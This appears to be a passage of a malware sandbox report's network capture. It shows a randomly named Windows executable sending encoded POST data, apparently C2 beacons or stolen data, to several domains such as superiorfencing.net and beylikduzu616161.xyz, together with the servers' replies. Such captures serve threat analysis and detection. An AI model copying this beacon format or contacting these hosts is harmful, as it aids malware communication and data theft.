                                                                      Nov 20, 2024 09:24:01.853827000 CET1236INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:24:01 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 35 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED]
                                                                      Data Ascii: 512<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJwcmg0PWFNcmNnL3ZuMkcvblZybmZkc3F0dFRLbjdsNUlwTjdDdURoVU9UajJvY1dyUVhrb1BIRmJsbjFGbUxvVGFXWTc0S1JvV2tYU1pVU2JqMmRDMXFXYlpXUHlSa3M0WXY0KytBUVpXOWVpU2JablhDVk9DQT09Jl9WSzg9N3BYRDh6UXhHRnhQIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGx [TRUNCATED]
                                                                      Nov 20, 2024 09:24:01.853849888 CET230INData Raw: 71 4c 79 6f 37 63 54 30 77 4c 6a 67 73 59 58 42 77 62 47 6c 6a 59 58 52 70 62 32 34 76 63 32 6c 6e 62 6d 56 6b 4c 57 56 34 59 32 68 68 62 6d 64 6c 4f 33 59 39 59 6a 4d 37 63 54 30 77 4c 6a 63 69 4c 43 41 69 64 58 4a 70 58 32 4d 69 4f 69 41 69 59
                                                                      Data Ascii: qLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjciLCAidXJpX2MiOiAiYzgyYyIsICJhcmdzX2MiOiAiNDg1OCIsICJyZWZlcmVyX2MiOiAiZjViZSIsICJhY2NlcHRfYyI6ICI0Y2ZjIn0="; } </script> </body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.1049993103.230.159.86806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:07.672748089 CET768OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 34 32 45 46 33 48 6c 6a 65 4a 47 53 38 4e 69 33 70 6f 50 33 4e 54 6a 2b 6d 52 59 71 7a 41 2b 61 77 6a 47 5a 32 6f 73 31 4f 5a 43 6b 59 59 5a 57 37 36 47 46 45 66 78 78 38 4e 61 4f 44 47 7a 55 73 35 57 4b 59 49 31 68 53 49 66 66 42 78 56 33 4e 30 78 72 51 61 34 45 35 32 41 54 49 52 4b 72 55 35 56 71 45 36 6a 52 56 78 72 37 63 43 6b 4b 78 4f 57 6b 4d 5a 77 6a 4d 73 79 34 59 45 39 37 66 55 47 32 67 70 5a 46 71 6f 75 63 55 45 43 76 71 44 52 4d 64 62 68 31 76 39 36 4a 7a 59 4a 79 4a 64 4c 76 44 54 59 59 6a 49 37 50 6a 61 2b 6d
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMdbh1v96JzYJyJdLvDTYYjI7Pja+m
                                                                      Nov 20, 2024 09:24:08.523195028 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:08 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.1049994103.230.159.86806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:10.219264984 CET792OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 61 61 77 43 32 5a 33 70 73 31 50 5a 43 6b 54 34 59 63 6c 4b 47 4f 45 66 4e 48 38 49 69 4f 44 47 6e 55 73 38 79 4b 5a 35 31 69 54 59 66 64 41 42 56 31 53 6b 78 72 51 61 34 45 35 32 55 39 49 58 69 72 56 4b 64 71 47 59 48 57 4b 42 72 34 5a 43 6b 4b 31 4f 57 67 4d 5a 78 32 4d 74 65 47 59 48 4a 37 66 56 32 32 67 34 5a 47 39 34 76 32 62 6b 44 43 6b 32 30 2b 62 4b 31 65 6a 73 65 6d 69 49 4a 49 4f 38 32 6f 53 43 35 50 77 2f 6e 42 74 63 4c 4d 4c 71 36 42 56 4e 64 52 32 61 76 47 4f 73 2b 30 76 6e 4e 51 30 77 3d 3d
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/nBtcLMLq6BVNdR2avGOs+0vnNQ0w==
                                                                      Nov 20, 2024 09:24:11.079086065 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:10 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.1049995103.230.159.86806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:12.761512041 CET1805OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 53 61 78 30 69 5a 32 4b 55 31 64 4a 43 6b 51 34 59 64 6c 4b 47 58 45 62 68 62 38 49 2f 37 44 45 66 55 71 66 4b 4b 65 4b 74 69 63 59 66 64 4c 68 56 30 4e 30 77 72 51 62 4a 4e 35 32 45 39 49 58 69 72 56 4b 78 71 43 4b 6a 57 5a 52 72 37 63 43 6b 65 78 4f 58 46 4d 5a 6f 42 4d 74 61 57 59 78 35 37 66 31 6d 32 6a 4b 78 47 69 49 76 30 59 6b 44 61 6b 32 77 6c 62 4f 64 53 6a 73 72 42 69 4b 5a 49 4c 4b 65 30 4e 79 31 6a 68 76 36 62 74 36 50 5a 42 4b 2b 36 55 66 30 77 78 65 58 6b 4f 2b 58 6f 67 30 30 70 71 34 4b 74 6c 61 41 6e 68 51 39 78 72 4b 73 67 6c 35 6a 2b 35 69 4e 67 4d 43 67 55 31 70 5a 42 62 65 41 73 7a 65 5a 42 6e 47 73 70 69 68 74 6b 49 2b 61 35 49 73 69 77 67 61 45 34 35 4b 4b 58 6e 53 44 53 4f 41 56 37 51 51 66 79 67 6d 63 49 6a 67 76 4f 42 6a 61 73 39 71 76 4c 5a 4e 36 6a 53 77 61 6a 38 6d 63 48 41 4a 32 58 74 67 49 73 42 68 2b 77 73 55 59 4b 35 6f 6b 7a 54 [TRUNCATED]
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzSax0iZ2KU1dJCkQ4YdlKGXEbhb8I/7DEfUqfKKeKticYfdLhV0N0wrQbJN52E9IXirVKxqCKjWZRr7cCkexOXFMZoBMtaWYx57f1m2jKxGiIv0YkDak2wlbOdSjsrBiKZILKe0Ny1jhv6bt6PZBK+6Uf0wxeXkO+Xog00pq4KtlaAnhQ9xrKsgl5j+5iNgMCgU1pZBbeAszeZBnGspihtkI+a5IsiwgaE45KKXnSDSOAV7QQfygmcIjgvOBjas9qvLZN6jSwaj8mcHAJ2XtgIsBh+wsUYK5okzTKi8C/PpfkPhhdY5lqsW4+vt8vn4X4g4BEZkWAJt+ourHrDne5yBJH/4cDAvMRSCzdZtrN5x5aldOspPHde85DCsco7soAOZeAGCBr6sNjOgATjxgEkdJtYSi1oazYR7/bmSo0YzTr/aPqPLO9nhA5GXVu22GQHjeagrlldb7/z5sbjI98WJWqFe1A0LeDdSQHwORigbcPH2gBCrvnNNsMZb8QnW4UXwjKw885CtlvZP6g2DH3Xa8pXwpDc4ISCtlqZWsyHwUzsMOvcoWVlE0hcuWLKwawJekXXf7RlpNkSBsAmA25VjI+G4S8u6k0mVN1TWEK+1ROyMCRYh2y9+6juTTQtG5vfx+4gSb7H4rVvdNtExjZsoFG+99pkEKrwOACNjVu1VNkxDD6z4WBT6NtFQz59t3iju+Thgii9IxydnWShN3p5bBJ/uF5o3MSHl5X1RrtU6OQrZMJuVr74680eCnpRHHfZHGbiiAX4xhUZq6vSB1Uca4mufCYQmUwGA7HjHd3y5CaPK+R27Dut7xEiE9cc9s1tLschAKOY5JnJCzeVq+jKcBNTzQp4y3TRj4utFo39emo7H3t0ek/1nB7JDZZfRFvaXKY3nKD5WPNQuc01atuP+9WHXT39F3t15gNd1lEl6nVy8/54iBJVFJ0vWYlqBZN+J2DS [TRUNCATED]
                                                                      Nov 20, 2024 09:24:13.633373022 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:13 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.1049996103.230.159.86806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:15.302953959 CET500OUTGET /bwyw/?prh4=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJGRHCEAKXdxR5M68AEOT1S+b5dkfA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:16.165601015 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:16 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.1049997188.114.97.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:21.241427898 CET771OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 4a 30 53 4f 4f 4d 6a 72 55 6f 7a 4b 64 37 54 75 70 61 62 41 33 56 73 56 69 41 55 4f
                                                                      Data Ascii: prh4=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaJ0SOOMjrUozKd7TupabA3VsViAUO
                                                                      Nov 20, 2024 09:24:21.911703110 CET828INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vytrQtgBdKwlAlT9EYzT6Cw0%2Bc%2Br1ZLd27pvzb2SIoHrqxxbiEO3QCFY%2B%2F7iaBU1AvcHHEVQG0JX5Sj2G9vAXeT%2B9QqALCXjCErxAhthD%2FAtUv7qKLrqAhCoiZj1hKVEP%2BXtC9RoPMnfLEM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b0f6d3d0c94-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Nov 20, 2024 09:24:21.911828995 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.1049998188.114.97.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:23.795907021 CET795OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 77 62 73 47 68 6b 62 6a 2b 46 6c 32 31 53 78 61 44 62 53 50 41 2f 37 6f 71 69 77 41 3d 3d
                                                                      Data Ascii: prh4=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6XkiwbsGhkbj+Fl21SxaDbSPA/7oqiwA==
                                                                      Nov 20, 2024 09:24:24.418405056 CET823INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
